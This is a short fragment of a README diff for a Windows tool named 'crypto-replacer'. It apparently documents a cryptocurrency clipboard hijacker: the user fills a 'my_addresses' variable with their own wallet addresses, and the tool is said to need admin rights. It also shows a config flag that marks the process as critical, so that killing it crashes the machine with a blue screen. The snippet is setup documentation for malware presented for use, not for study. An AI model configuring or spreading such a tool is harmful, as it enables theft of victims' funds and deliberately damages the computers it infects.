matifanger/crypto-replacer/readme.md

 Look for variable (`my_addresses`) and setup with anything you want.

 ### Useful functionalities (CURRENTLY WORKING) (Only windows):
+[!]
+Open the file with admin permissions are required for some functions.

 ```py
 CRITICAL_PROCCESS = True # Mark the proccess as critical, if interrumpted, blue screen appears.